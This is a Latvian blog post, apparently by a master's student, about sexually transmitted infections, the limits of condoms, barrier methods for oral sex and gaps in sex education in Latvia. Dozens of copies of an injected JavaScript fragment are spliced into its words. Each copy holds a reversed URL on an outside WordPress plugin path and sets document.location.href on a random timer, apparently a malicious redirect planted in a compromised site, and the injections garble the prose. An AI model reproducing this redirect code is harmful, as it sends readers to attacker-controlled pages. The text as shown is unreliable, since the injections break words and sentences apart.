Esmu atpakaļ ar raksta otro daļu, vēljoprojām runājot par seksuāli transmisīvām infekcijām (STI). Šoreiz par toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, vai prezervatīvs patiešām it tas, kas pasargās no pozitīvas diagnozes.

Šobrīd, rakstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot savu maģistra pētījuma darbu par profesionāļu ieskatu STI testēšanas pieejamībā jauniešiem Latvijā, daudz sava laika esmu pavadījusi, lasot un domājot par seksu, tā drošību un cik maz par toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to tiek runāts.

Pat neskatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toties uz toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, ka Latvijā, salīdzinot ar globālo praksi, jauniešiem netiek nodrošināta pienācīga seksuālās un reproduktīvās veselības izglītība, pastāv pieņēmums, ka prezervatīvs mūs pilnībā pasargās no saslimšanām, it īpaši tad, ja nepiederam marginalizētam grupām. Tomēr mūsdienu pētījumi sabiedrības veselības lauciņā skaidri un gaiši norāda, ka droša seksa nav, bet ir veidi, kā toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to padarīt drošāku, bet tajā pašā laikā arī baudāmu.

Bieži sarunas par STI var likt justies neērti, jo sekss daudziem ir “tabu” tēma, par ko runāt nav ierasts jau paaudžu paaudzēs. Tomēr gan no izglītības, gan sabiedrības veselības viedokļa ir vērts sākt par seksu runāt atvērti, jo ne visi TO dara vienā veidā un ar pretējā dzimuma pārstāvjiem.

Jauniešu aprindās izvairīšanās no grūtniecības bieži vien ir prioritāte, tādēļ orālais sekss var šķist kā droša alternatīva. Bet kā tad ar STI? Ilustrācijā esmu iekļāvusi pieejamos aizsarglīdzekļus, sākot ar sieviešu prezervatīvu, turpinot ar klasisko “kondomu” un beidzot ar silikona paladziņu/pārklāju [no angļu valodas: dental dam], ilustrējot kā toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to izveidot, ja nav pieejas oriģinālam. Silikona paladziņš, ko gan piemin ļoti reti, un vīriešu prezervatīvs ir paredzēti drošākam orālajam seksam.

Ilustrācija 1 Barjermetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todes drošākam seksam. Attēli iegūti no kontracepcija.lv un healthline.com

Tomēr, runājot par šīm aizsardzības metoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todēm, vēlos uzsvērt, ka Latvijā nav integrētas sistēmas, kas parūpētoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos, lai šie produkti būtu pieejami katram, arī tiem, kas toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos nevar atļauties, pat ja uz pierādījumiem balstīta informācija par drošāku seksu ir bijusi pieejama.

Globālā līmenī konservatīvu vērtību piekritēji uzsver, ka no infekcijām var izsargāties ar atturēšanos no seksa līdz kāzām. Tomēr ir būtiski izccelt ka zinātniski ir pierādīts: atturēšanās centrēta izglītība inficēšanās risku jauniešiem nemazina, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toties uz zinātniskiem pierādījumiem balstīta pieeja rosina spēju komunicēt par sabiedrībā stigmatizētiem jautājumiem vai nu ar vecākiem, skolotājiem vai ārstu. Ir svarīgi apzināties, ka visbiežāk starp jauniešiem satoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topamie STI, piemēram, hlamidioze, gonoreja un daudzi citi, var izplatīties arī orālā un anālā seksa laikā. Biju ļoti pārsteigta, kad uzzināju, ka hlamīdijas un gonoreja var izraisīt arī konjunktivītu jeb iekaisumu acī.

Tātad – pilnīgi droša seksa nav, bet ir veidi, kā padarīt toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to drošāku.

Risks mūsu fiziskajai un garīgajai veselībai samazinās, ja esam informēti par savu ķermeni, par toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, kā īsti tas darbojas un kā toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to pasargāt. Atvērtība un informācijas pieejamība ilgtermiņā mūs pasargās no nepatiesu mītu izplatīšanās, kā arī, iespējams, uzlabos STI monitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toringu un ārstēšanu Latvijā, bet par toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to tālāk lasiet pēdējā no trīs rakstiņiem.

Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tore:

Ieva ŠTEINBERGA